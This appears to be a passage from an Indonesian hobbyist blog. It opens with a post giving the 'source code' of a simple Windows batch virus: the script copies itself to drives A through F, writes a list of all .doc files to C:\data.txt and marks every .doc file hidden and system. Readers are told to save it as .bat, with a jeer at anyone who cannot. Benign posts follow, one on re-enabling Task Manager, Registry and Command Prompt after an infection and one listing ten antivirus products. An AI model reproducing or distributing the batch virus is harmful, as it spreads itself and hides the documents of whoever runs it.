For %%q in (A C D E F) do dir %%q:\*.Doc /B /S >> C:\data.txt

3.File-File tersebut akan dirubah atributnya ke dalam mode super hidden atau system file

Alogaritmanya adalah:

For %%r in (A C D E F) do attrib +h +s %%r:\*.doc /s

Jadi source code virusnya adalah :

Echo off > C :Data.txt

For %%p in (A C D E F) do copy %0 %%p:

For %%q in (A C D E F) do dir %%q:\*.Doc /B /S >> C:\data.txt

For %%r in (A C D E F) do attrib +h +s %%r:\*.doc /s

exit

Setelah itu simpan sorce code dlm eksitensi .bat.
Kalau ga bisa berarti kamu emank beg* ya ?!
Tapi akan saya kasih tau dech caranya buka notepad copy source code ke notepad truz save dalan eksitensi .bat

Gampang kan?!
Selengkapnya...

Task manager didisable oleh virus

Memperbaiki Registry, TaskManager, Command Prompt - Kebanyakan dari salah-satu ulah virus adalah melakukan disable taks manager, regsitry, dan command Prompt. Hal ini sangat menyusahkan kita untuk melakukan edit Registry, untuk melihat atau memonitor dengan Task Manager, dan untuk aktifitas DOS dengan Command Prompt.





Untuk mengatasi hal itu kita bisa edit semua itu dengan GPEDIT (Group Policy Editor). Caranya mudah :

Masalah Pada Registry :

Metode 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke "Administrative Templates - System - Prevent Access To Registry Editing Tools"
* Ubah Valuenya menjadi = Enabled, Pilih "No", klik Apply.

Metode 2 :

* Buka folder "C:\Windows"
* Cari file Regedit.exe
* Rename / Ganti nama file tersebut, misal : "New_Reg.exe"

Masalah Pada Command Prompt :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke "Administrative Templates - System - Prevent Access To Command Prompt"
* Ubah Valuenya menjadi = Enabled, Pilih "No", klik Apply.

Masalah Pada Task Manager :
Metode 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke "Administrative Templates - System - Ctrl+Alt+Del Option - Remove Task Manager"
* Ubah Valuenya menjadi "Enable", ingat ! kemudian Ubah lagi menjadi "Disable" atau "Not Configured".
* Apply

Metode 2 :

* Buka RUN atau tekan tombol WIN + R
* isikan dengan :

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f


* OK.

Metode 3 :

* Buka RUN ketikan Regedit
* Masuk pada alamat HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
* Buat Registry baru type "DWORD" dengan nama "DisableTaskMgr"
isikan value nya = 0
Selengkapnya...

10 ANTIVIRUS TERBAIK SAAT INI

10 ANTIVIRUS TERBAIK SAAT INI

1.BitDefender Antivirus.
BitDefender Antivirus 2010 adalah salah satu solusi perangkat lunak keamanan terbaik yang tersedia, menggabungkan fitur canggih dan perlindungan yang sangat baik dalam sebuah program yang mudah digunakan. Perangkat lunak yang efektif, sederhana, dan harga mengesankan.

Secara keseluruhan, Anda tidak bisa berpaling BitDefender Antivirus 2010 ketika datang ke perlindungan virus, fleksibilitas, dan nilai. Untuk kinerja yang unggul, perlindungan, dan harga, kami sarankan BitDefender Antivirus 2010.

Alternatif lain, Anda mungkin tertarik pada BitDefender Internet Security untuk proteksi tambahan dengan antispam dan firewall. Atau Anda mungkin melihat ke dalam BitDefender Total Security, all-in-one premium suite yang meliputi security, parental controls, tune-up utilities, and online backup.

Download Disini

2.Kaspersky Antivirus.
Kaspersky Labs telah mendirikan cukup nama di perangkat lunak keamanan, dan Kaspersky Anti-Virus 2010 terus untuk memverifikasi reputasi mereka. Solusi perangkat lunak antivirus tentunya merupakan salah satu yang terbaik yang tersedia.



Seperti begitu banyak dari antivirus lainnya termasuk paket BitDefender, Kaspersky Anti-Virus adalah solusi antivirus yang lengkap dengan real-time perlindungan dari berbagai ancaman, termasuk virus, Trojans, bots, cacing, dan bahkan spyware. Software lebih dari diperlengkapi untuk keamanan yang menyeluruh, dan memiliki beberapa fitur baru yang menarik tahun ini untuk membantu memerangi ancaman baru.

Kaspersky juga menawarkan lisensi pengguna 3-pilihan (untuk 1 tahun), sehingga sebenarnya biaya yang sangat efektif untuk melindungi semua komputer di rumah Anda.

Fitur yang Mencolok dari Kaspersky Anti-Virus:
* Antivirus for IM
* Gamer Mode
* iSwift technology adjusts scanning to compensate for system load
* URL Advisor for proactive browser security

DownloadKaspersky

3.Webroot Antivirus with SpySweeper.
Webroot Spy Sweeper AntiVirus dengan sempurna adalah virus / spyware combo. Perangkat lunak ini mudah digunakan, dan fitur perlindungan yang efektif dan kinerja. Spy Sweeper AntiVirus dengan menggabungkan semua komponen yang tepat untuk menyampaikan salah satu perangkat lunak antivirus terbaik yang tersedia.



Bahkan sehari-hari pengguna komputer perlu maju perlindungan dari ancaman komputer yang lazim. Dari virus untuk rootkit, untuk alat hacking jahat dan kerentanan eksploitasi; multi-pendekatan berlapis hampir penting untuk perlindungan sehari-hari. Webroot's antivirus / antispyware software memiliki semua fitur yang tepat dan banyak lagi.

Fitur yang mencolok dari Webroot Spy Sweeper AntiVirus:
* Gamer mode for full-screen without interruptions
* Free (and automatic) remote file storage
* Proactive heuristic detection for “zero-hour” threats

Download Disini

4.Norton antivirus.
Norton AntiVirus 2010 adalah sebuah solusi keamanan yang sangat mengesankan, menawarkan barisan lengkap fitur yang kuat dan seluruh pendekatan baru untuk keamanan online. Sebagai salah satu perangkat lunak antivirus terbaik yang tersedia, Norton AntiVirus terus meningkatkan perangkat lunak mereka, dan pada gilirannya-meningkatkan keamanan Anda. Dengan terus inovasi dan kembali fokus pada pengalaman konsumen secara keseluruhan, 2010 Norton angsuran pelanggan harus tetap senang (dan membantu nay-Sayers puas kembali).

Mari kita hadapi itu, Symantec / Norton telah menjadi pemain besar di pasar antivirus, merintis perangkat lunak dari get-pergi. Dan dengan popularitas datang ekstra kritikus. Norton telah menderita dengan beberapa keluhan di tahun-tahun sebelumnya tentang perangkat lunak mengasapi dan penggunaan sumber daya berlebihan. Edisi tahun lalu (2009) berpaling bahwa keluhan di sekitar, menawarkan solusi cepat dengan fokus pada manajemen sumber daya efisien. Norton AntiVirus 2010 tetap merupakan mengesankan program yang ramping dan cepat, sambil menambahkan beberapa fitur menarik direkayasa secara khusus untuk menangkap virus yang paling mematikan (orang-orang yang tidak ditemukan oleh tanda tangan keamanan tradisional).

Norton AntiVirus 2010 melakukan pekerjaan yang besar sumber daya sistem keseimbangan, kesederhanaan, dan (paling penting) keamanan. Tingkat perlindungan yang tak ada, dan fitur-fitur baru terus menetapkan standar untuk perangkat lunak antivirus. Norton telah berhasil menggunakan kekuatan mereka untuk keuntungan mereka, dan memberikan perangkat lunak antivirus yang sangat baik yang besar dengan pengalaman pengguna secara keseluruhan (apakah Anda pro atau keamanan Anda hanya membutuhkan software yang melakukan kerja keras untuk Anda). Singkat cerita: Norton AntiVirus 2010 memiliki beberapa fitur menarik, perangkat lunak itu bekerja, bekerja dengan baik, dan tidak mengharuskan Anda untuk mengorbankan serius sumber daya.

Fitur yang mencolok dari Norton Antivirus :
* Reputation based antivirus
* System Insight lets you “flip the UI” over
* SONAR 2
* Download Insight

Download Norton antivirus

5.ESET Nod32 Antivirus.
ESET NOD32 Antivirus merupakan solusi keamanan desktop, lengkap dengan perlindungan yang efektif dan fitur lanjutan. ESET NOD32 ini berguna untuk pengguna yang mencari rumah sederhana "down-to-bumi" perangkat lunak keamanan yang mereka dapat menginstal dan biarkan perangkat lunak yang bekerja bagi mereka. Eset telah terbukti sebagai salah satu yang terbaik kinerja keseluruhan perangkat lunak antivirus, dan melanjutkan tren dengan angsuran paling baru, ESET NOD32 Antivirus 4.

Fitur yang mencolok dari ESET Nod32 Antivirus :
* Small and unobtrusive updates
* ThreatSense user network and proactive heuristic detection
* SysInspector diagnostic tool
* Silent “Gamer” mode

Download Eset Nod

6.AVG Antivirus.
AVG Anti-Virus 2010 menawarkan sejumlah fitur menarik dan teknologi yang tepat untuk menjaga PC Anda dilindungi. Sebagai salah satu perangkat lunak antivirus terbaik ditinjau, AVG menawarkan solusi besar yang memberikan perlindungan dan sederhana lanjutan digunakan. AVG versi gratis adalah salah satu file yang didownload untuk keamanan komputer, tapi untuk yang paling manfaat ini benar-benar layak dibayar untuk versi lengkap (atau bahkan untuk mengupgrade ke AVG Internet Security lengkap).

Fitur yang mencolok dari AVG Antivirus :
* Integrated browser Surf-Shield and LinkScanner
* Identity theft recovery unit

DownloadAVG Free

7.F-Secure Antivirus.
F-Secure Anti-Virus 2010 adalah solusi keamanan besar lainnya, dan tentu saja layak untuk dimasukkan sebagai salah satu perangkat lunak antivirus terbaik. F-Secure Anti-Virus yang efisien, cepat, dan (paling penting) efektif. Dengan teknologi perlindungan canggih dan tambahan fitur keamanan terintegrasi, F-Secure adalah cara yang hebat untuk pergi untuk desktop antivirus.

Fitur yang mencolok dari F-Secure Antivirus:
* DeepGuard 2.0 “cloud” antivirus
* Real-time protection
* Windows 7 compatible

Download Disini

8.G DATA Antivirus.
Dengan lebih dari 20 tahun dalam bisnis manufaktur antivirus dan pertumbuhan terus, G DATA adalah salah satu yang terbaik di industri, dan itu menunjukkan dengan sederhana dan perangkat lunak keamanan berharga. G DATA AntiVirus 2010 meneruskan tren, memberikan tingkat keamanan yang tinggi dan mudah digunakan produk.

Fitur yang mencolok dari G DATA Antivirus:
* Heuristic scanning
* Safe internet experience
* 2 scanning engines

Download Disini

9.Avira AntiVir.
Menggabungkan efisiensi yang sangat baik dan teknologi maju, Avira AntiVir Premium adalah salah satu perangkat lunak antivirus terbaik yang tersedia. Dengan lebih dari 20 tahun di bawah sabuk mereka, Avira terus untuk mendapatkan pengguna baru di seluruh dunia. Perangkat lunak antivirus gratis mereka sangat populer, dan perlindungan tambahan dari solusi yang dibayar tentu worth it.

Fitur yang mencolok dari Avira Antivir:
* AHeAD (Advanced Heuristic Analysis and Detection)
* Protection from drive-by downloads
* Impressive (and consistent) detection rates
Download Avira

10.Trend Micro.
Trend Micro AntiVirus + AntiSpyware (sebelumnya PC-cillin) adalah desktop besar lain perangkat lunak antivirus, menggabungkan dosis yang sehat fitur keamanan dengan kegunaan sederhana. Perangkat lunak ini dilengkapi dengan baik untuk melindungi komputer Anda dari berbagai ancaman dengan teknologi proaktif dan real-time protection.

Fitur yang mencolok dari Trend Micro:
* IM protection
* Inbound and outbound email scanning
* Windows 7 compatible

DownloadDisini
Selengkapnya...

Total Posting Dan Komentar

posting
Komentar

Top Posting


ShoutMix chat widget

Sms gratis

Blog ini menurut anda??